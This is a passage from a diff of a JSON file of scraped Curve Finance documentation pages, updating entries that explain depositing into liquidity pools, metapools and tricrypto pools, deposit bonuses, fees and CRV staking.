provide liquidity on Curve? When you go to the deposit page and deposit one stablecoin, it then gets split between each token in the pool. Thats something you have to keep in mind because if you were to deposit 1000 DAI in the Pool, as per the screenshot below, your balance would be roughly equal to 390.7 GUSD, 120 DAI, 119.8 USDC and 362.6 USDT. Those values change constantly as people trade and arb the price of stable coins. Does the coin I deposit matter? Besides the deposit bonus explained below, it doesnt matter. Your tokens will get split into the pool and it doesnt affect your returns so you can deposit one, some or all the coins into the pool without worrying about it affecting your returns. Understanding deposit bonuses On the screenshot above, you can see GUSD is quite low as it should make up 50% of the total pool because it's a metapool paired against 3crv. So if your plan was to join the gusd-pool, you would ideally deposit GUSD into it. As you can see on the screenshot, you would get an instant 0.0082% bonus for depositing GUSD into the pool. The main reason for this is that GUSD is currently slightly more expensive so if you went to a centralized exchange you might sell it for $1.007 instead of $1. The deposit bonus reflects that. The other reason behind this is that the pools are always trying to balance themselves and go back to equal parts (in this case 50% GUSD) so depositing the coin with the lowest share will get you a deposit bonus. But does that mean I can still withdraw in my favorite stable coin? When you withdraw, the same principle applies (but reversed). If you withdraw the stable coin with the biggest share, you would get a bonus but you still choose what stable coin you want to withdraw. How quickly does interest accrue/compound? Interests for pools using lending protocols compound every block or 15 seconds or immediately after fees are paid. Its also compounded automatically. What is arbitrage? Arbitrage is the simultaneous buying and selling of, in our case, a token to make a profit. Because cryptocurrency markets can often lack liquidity, there are often opportunities for traders to take advantage of price discrepancies to make a profit which can be helped by protocols like Curve. An example of that below: https://etherscan.io/tx/0x259b7ac1f50554fe5ddcfeea7b4fa90ad70356ddfbbd341289db0dfbf99447f9 In this transaction, someone used Curve and OasisDex and made around $200. This goes back to what was discussed earlier with liquidity pools. The idea is that is you incentivize traders to take advantage of price discrepancies which we all get rewarded for. What are incentivized pools? Liquidity pools (particularly one without an opportunity cost) are a great way to help stable coins keep their pegs. It makes easy for traders to arb (see question above) when the price slips off the peg which is very important for all the companies and foundations developing stable coins as having a $0.98 stablecoin is never a good look. As a result, some pools on Curve are incentivized. That means that on top of trading fees and lending fees, the companies will give rewards to people providing liquidity to the pools with their coins. What makes the incentives APR move? The steth pool in this screenshot earns another 2.69% of LDO per year and there are three variables that can make this change: The LDO distributed is based on the number of people staking their LP tokens, which means your share of rewards gets lower if more people start staking The price of LDO (price of LDO going up would make the yearly bonus go up) The size of weekly rewards (48,000 SNX as of today) could also be lowered as Lido reevaluates its partnership with Curve 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Depositing", + "title": "Overview", "html_url": "https://resources.curve.fi/lp/depositing/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing Table of contents Depositing Before depositing... Choosing the right pool Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Depositing Before depositing... Choosing the right pool Depositing Depositing Before depositing... Before depositing into a Curve pool, it is highly recommended to familiarise yourself with how Curve works, how it makes money and its basic mechanisms. You can do so by visiting the page below: Understanding Curve v1 Choosing the right pool Curve has many pools to choose from currently accepting stable coins and tokenised Bitcoin (Bitcoin on Ethereum). If you are not sure which pool is right for you, click the link below: Understanding Curve Pools Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Overview Table of contents Before depositing... Choosing the right pool Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Before depositing... Choosing the right pool Home Liquidity Providers Depositing Overview Before depositing... Before depositing into a Curve pool, it is highly recommended to familiarise yourself with how Curve works, how it makes money and its basic mechanisms. You can do so by visiting the page below: Understanding Curve v1 Understanding Curve v2 Choosing the right pool Curve has many pools to choose from currently accepting stable coins and tokenised Bitcoin (Bitcoin on Ethereum). If you are not sure which pool is right for you, click the link below: Understanding Curve Pools 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2066,39 +2082,47 @@ { "title": "Understanding curve pools", "html_url": "https://resources.curve.fi/lp/understanding-curve-pools/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Understanding curve pools Table of contents Understanding Curve Pools What are liquidity pools? Base vAPY What are Curve fees? Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Curve Pools What are liquidity pools? Base vAPY What are Curve fees? Understanding curve pools Understanding Curve Pools As you should know, providing liquidity has its fair share of risks so in this article, we review the different Curve pools to help you find one that matches your risk tolerance while explaining the risks involved with being a liquidity provider on Curve. There are currently several Curve pools with new pools added all the time. Its important to understand that when you provide liquidity to a pool, no matter what coin you deposit, you essentially gain exposure to all the coins in the pool which means you want to find a pool with coins you are comfortable holding. Before we continue, we assume you have familiarized yourself with the basics of Curve: Understanding Curve v1 All Curve liquidity gauges receive CRV based on how much the DAO allocates to it. What are liquidity pools? If you are new to Ethereum or DeFi, liquidity pools are a seemingly complicated concept to understand. Liquidity pools are pools of tokens that sit in smart contracts. If you were to create a pool of DAI and USDC where 1 DAI = 1 USDC. You would have the same amount of tokens, lets say 1,000 tokens (1,000 DAI and 1,000 USDC) in the pool. If trader 1 comes and exchange 100 DAI for 100 USDC, you would then have 1,100 DAI and 900 USDC in the pool so the price would tilt slightly lower for USDC to encourage another trader to exchange USDC for DAI and average the pool back. You can see those details for each pool and it is something you can take advantage of when depositing. On the screenshot above for the TriCrypto v2 Pool , the three volatilely priced tokens are held in proportions similar to their price. If the coins are out of proportion traders are incentivized to take advantage of the arbitrage, which will push the balances in the pool back towards proportion Base vAPY To understand what the different pools do, its also important to understand how Curve makes money for liquidity providers. Curve interests come from trading fees. Every time someone uses Curve to exchange tokens, through the Curve website, 1inch, Paraswap or another dex aggregator, a small fee is distributed to liquidity providers. This is why base vAPY increases with volume on Curve. Some pools (Compound, PAX, Y, BUSD) also earn interest from lending protocols. Behind the scenes, those four pools also use lending protocols (like Compound or AAVE) to help generate more interest for liquidity providers. Whilst it means those pools can be better performers when lending rates are high, its also worth noting it also adds more layers of risks. All pools earn interest from trading fees. Some pools also earn interest from lending and there are also some pools with incentives. You can also receive CRV when you provide liquidity on Curve Finance. Each liquidity gauge receives a different amount of CRV based on how much the DAO allocates to it. Every time someone makes a trade on Curve.fi, liquidity providers (people who have deposited funds onto Curve) get a small fee split evenly between all providers, this is why you will see high vAPYs on days with high volume and high volatility. Its important to note that because fees are dependent on volume, daily vAPYs can often be quite low just like they can be very high. What are Curve fees? Swap fees are typically around 0.04% which is thought to be the most efficient when exchange stable coins on Ethereum. Deposit and withdrawals have fees between 0% and 0.02% depending if depositing and withdrawing in imbalance or not. If fees were 0%, users could, for example, deposit in USDC and withdraw in USDT for free. Balanced deposits or withdrawals are free. Last update: 2023-09-04 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Understanding curve pools Table of contents What are liquidity pools? Base vAPY What are Curve fees? Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents What are liquidity pools? Base vAPY What are Curve fees? Home Liquidity Providers Understanding curve pools As you should know, providing liquidity has its fair share of risks so in this article, we review the different Curve pools to help you find one that matches your risk tolerance while explaining the risks involved with being a liquidity provider on Curve. There are currently several Curve pools with new pools added all the time. Its important to understand that when you provide liquidity to a pool, no matter what coin you deposit, you essentially gain exposure to all the coins in the pool which means you want to find a pool with coins you are comfortable holding. Before we continue, we assume you have familiarized yourself with the basics of Curve: Understanding Curve v1 All Curve liquidity gauges receive CRV based on how much the DAO allocates to it. What are liquidity pools? If you are new to Ethereum or DeFi, liquidity pools are a seemingly complicated concept to understand. Liquidity pools are pools of tokens that sit in smart contracts. If you were to create a pool of DAI and USDC where 1 DAI = 1 USDC. You would have the same amount of tokens, lets say 1,000 tokens (1,000 DAI and 1,000 USDC) in the pool. If trader 1 comes and exchange 100 DAI for 100 USDC, you would then have 1,100 DAI and 900 USDC in the pool so the price would tilt slightly lower for USDC to encourage another trader to exchange USDC for DAI and average the pool back. You can see those details for each pool and it is something you can take advantage of when depositing. On the screenshot above for the TriCrypto v2 Pool , the three volatilely priced tokens are held in proportions similar to their price. If the coins are out of proportion traders are incentivized to take advantage of the arbitrage, which will push the balances in the pool back towards proportion Base vAPY To understand what the different pools do, its also important to understand how Curve makes money for liquidity providers. Curve interests come from trading fees. Every time someone uses Curve to exchange tokens, through the Curve website, 1inch, Paraswap or another dex aggregator, a small fee is distributed to liquidity providers. This is why base vAPY increases with volume on Curve. Some pools (Compound, PAX, Y, BUSD) also earn interest from lending protocols. Behind the scenes, those four pools also use lending protocols (like Compound or AAVE) to help generate more interest for liquidity providers. Whilst it means those pools can be better performers when lending rates are high, its also worth noting it also adds more layers of risks. All pools earn interest from trading fees. Some pools also earn interest from lending and there are also some pools with incentives. You can also receive CRV when you provide liquidity on Curve Finance. Each liquidity gauge receives a different amount of CRV based on how much the DAO allocates to it. Every time someone makes a trade on Curve.fi, liquidity providers (people who have deposited funds onto Curve) get a small fee split evenly between all providers, this is why you will see high vAPYs on days with high volume and high volatility. Its important to note that because fees are dependent on volume, daily vAPYs can often be quite low just like they can be very high. What are Curve fees? Swap fees are typically around 0.04% which is thought to be the most efficient when exchange stable coins on Ethereum. Deposit and withdrawals have fees between 0% and 0.02% depending if depositing and withdrawing in imbalance or not. If fees were 0%, users could, for example, deposit in USDC and withdraw in USDT for free. Balanced deposits or withdrawals are free. 2023-09-28 Back to top", + "labels": [ + "Documentation" + ] + }, + { + "title": "Despositing into a cryptoswap-pool", + "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-a-cryptoswap-pool/", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a cryptoswap-pool Table of contents Depositing into the pool Confirming and staking Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Depositing into the pool Confirming and staking Home Liquidity Providers Depositing Despositing into a cryptoswap-pool Cryptoswap pools contain two volatile assets and are designed to offer deep liquidity for a wide variety of assets with different levels of volatility. Learn more about v2 pools For instance, the CVX/ETH pool is used in the examples below. Depositing into the pool Visit the deposit page ( https://curve.fi/#/ethereum/pools/cvxeth/deposit ). You will need at least one of the two tokens in the pool to deposit. CVX/ETH-pool consists of CVX and ETH. First, it's important to understand that you don't have to deposit both coins, you can deposit one or both of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small positive price impact. Since crypto pools have a rebalancing mechanism, the balances of the pool should be relatively equal. Second, once you deposit one coin, it gets split over the two different coins in the pool which means you now have exposure to all of them . The first checkbox (Add all coins in a balanced proportion) allows you to deposit both coins in the same proportion they currently are in the pool, resulting in no price impact. The second checkbox (Deposit Wrapped) allows users to deposit wrapped ETH (wETH) instead of plain ETH. Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will deposit your into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. This second transaction will only pop up if you deposited your tokens under the \"Deposit and stake\" tab. Otherwise it will just deposit the tokens in the pool. If you already have LP tokens, you can also directly stake them into the gauge under the 'Stake' tab. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO: Boosting your CRV Rewards Staking your $CRV 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Depositing into a metapool", + "title": "Despositing into a metapool", "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-a-metapool/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into a metapool Table of contents Depositing into a Metapool Depositing Confirming and staking Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Depositing into a Metapool Depositing Confirming and staking Depositing into a metapool Depositing into a Metapool Metapools is a new concept to Curve Finance, it allows a single coin to be pooled with all the coins in another (base) pool without diluting its liquidity. Currently, the most common base pool is the 3Pool. It uses the three most liquid stable coins (USDT-USDC-DAI). Base & MetaPools Depositing Metapools offer several options for deposits. For example, in the [GUSD,[3Pool]] Metapool you can deposit the following: GUSD Any of the 3Pool (DAI-USDC-USDT) 3Pool LP token (3crv) When becoming a liquidity provider, you don't have to deposit all the coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus. Second, once you deposit one stable coin, it gets split over the four different coins in the pool which means you now have exposure to all of them . The first checkbox (Add all coins in a balanced proportion) allows you to deposit all four coins in the same proportion they currently are in the pool. The deposit wrapped option lets you deposit the base pool token (usually 3Pool). If you don't want to add all your stable coins, just click the \"Use maximum amount of coins available\" checkbox and enter the number of coins you wish to deposit and click \"Deposit and Stake\". If you deposit 3Pool LP token into a Metapool, you will be earning at the rate of the Metapool gauge but you earn trading fees from both the base and meta pool. Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will wrap your stable coins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO. Boosting your CRV Rewards Staking your $CRV Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into a metapool Table of contents Depositing Confirming and staking Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Depositing Confirming and staking Home Liquidity Providers Depositing Despositing into a metapool Metapools is a new concept to Curve Finance, it allows a single coin to be pooled with all the coins in another (base) pool without diluting its liquidity. Currently, the most common base pool is the 3Pool. It uses the three most liquid stable coins (USDT-USDC-DAI). Base & MetaPools Depositing Metapools offer several options for deposits. For example, in the GUSD/3Pool Metapool you can deposit the following: GUSD Any of the 3Pool (DAI-USDC-USDT) 3Pool LP token (3crv) When becoming a liquidity provider, you don't have to deposit all the coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus. Second, once you deposit one stable coin, it gets split over the four different coins in the pool which means you now have exposure to all of them . The first checkbox (Add all coins in a balanced proportion) allows you to deposit all four coins in the same proportion they currently are in the pool, resulting in no slippage occurrence. The deposit wrapped option lets you deposit the base pool token (usually 3Pool). When depositing coins into a metapool, and thus having exposure to a base pool token (e.g., 3CRV) and its paired token, you will earn at the rate of the metapool gauge. However, you'll receive trading fees from both the base and metapool. Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will wrap your stable coins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. This second transaction will only pop up if you deposited your tokens under the \"Deposit and stake\" tab. Otherwise it will just deposit the tokens in the pool. If you already have LP tokens, you can also directly stake them into the gauge under the 'Stake' tab. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO: Boosting your CRV Rewards Staking your $CRV 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Depositing into the susd pool", - "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-the-susd-pool/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the susd pool Table of contents Depositing into the sUSD Pool Depositing into the pool Confirming and staking Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Depositing into the sUSD Pool Depositing into the pool Confirming and staking Depositing into the susd pool Depositing into the sUSD Pool If youre wanting to figure out Curve, please read the starter guide . After reading this, you should have an understanding of how Curve works, how it makes money for liquidity providers and its risks which is ideally what you want before providing liquidity. Understanding Curve v1 Curve Finance sUSD pool has quickly become the biggest pool thanks to its SNX incentives which guarantee continuous returns to liquidity providers. The sUSD pool was born out of a partnership between Curve and Synthetix who sought to help bring stability to their stablecoin sUSD. The pool is not a lending pool which means your main APY only comes from trading fees. The pool has sUSD, DAI, USDC and USDT. Unlike Y pool, the sUSD pool is quite cheap to deposit in making it a good choice if you want to try Curve with a small amount. The current rewards have no expiry date but can be adjusted by a vote from Synthetix governance. Depositing into the pool Visit the deposit page ( https://www.curve.fi/susdv2/deposit ). You will need one or multiple stablecoins to deposit. The sUSD pool takes DAI, USDC, USDT and sUSD. First, it's important to understand that you don't have to deposit all coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus. Second, once you deposit one stable coin, it gets split over the four different coins in the pool which means you now have exposure to all of them . The first checkbox (Add all coins in a balanced proportion) allows you to deposit all four coins in the same proportion they currently are in the pool. If you don't want to add all your stablecoins, just click the \"Use maximum amount of coins available\" checkbox and enter the number of coins you wish to deposit and click \"Deposit and Stake\". Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will wrap your stablecoins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV and SNX . You can claim both those tokens from the minter gauge. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards. Last update: 2023-08-15 Back to top", + "title": "Despositing into a tricrypto-pool", + "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-a-tricrypto-pool/", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Despositing into a tricrypto-pool Table of contents Depositing into the pool Confirming and staking Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Depositing into the pool Confirming and staking Home Liquidity Providers Depositing Despositing into a tricrypto-pool Tricrypto pools contain three volatile assets. Learn more about v2 pools For instance, the TriCRV pool is used in the examples below. Depositing into the pool Visit the deposit page ( https://curve.fi/#/ethereum/pools/factory-tricrypto-4/deposit ). You will need at least one of the three tokens in the pool to deposit. The TriCRV pool consists of CRV, crvUSD, and ETH. First, it's important to understand that you don't have to deposit all coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small positive price impact. Since crypto pools have a rebalancing mechanism, the balances of the pool should be relatively equal. Second, once you deposit one coin, it gets split over the three different coins in the pool which means you now have exposure to all of them . The first checkbox (Add all coins in a balanced proportion) allows you to deposit all three coins in the same proportion they currently are in the pool, resulting in no price impact. The second checkbox (Deposit Wrapped) allows users to deposit wrapped ETH instead of plain ETH. Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will deposit your into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. This second transaction will only pop up if you deposited your tokens under the \"Deposit and stake\" tab. Otherwise it will just deposit the tokens in the pool. If you already have LP tokens, you can also directly stake them into the gauge under the 'Stake' tab. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO: Boosting your CRV Rewards Staking your $CRV 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Depositing into the tri pool", - "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-the-tri-pool/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the tri pool Table of contents Depositing into the Tri-Pool Depositing into the pool Confirming and staking Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal 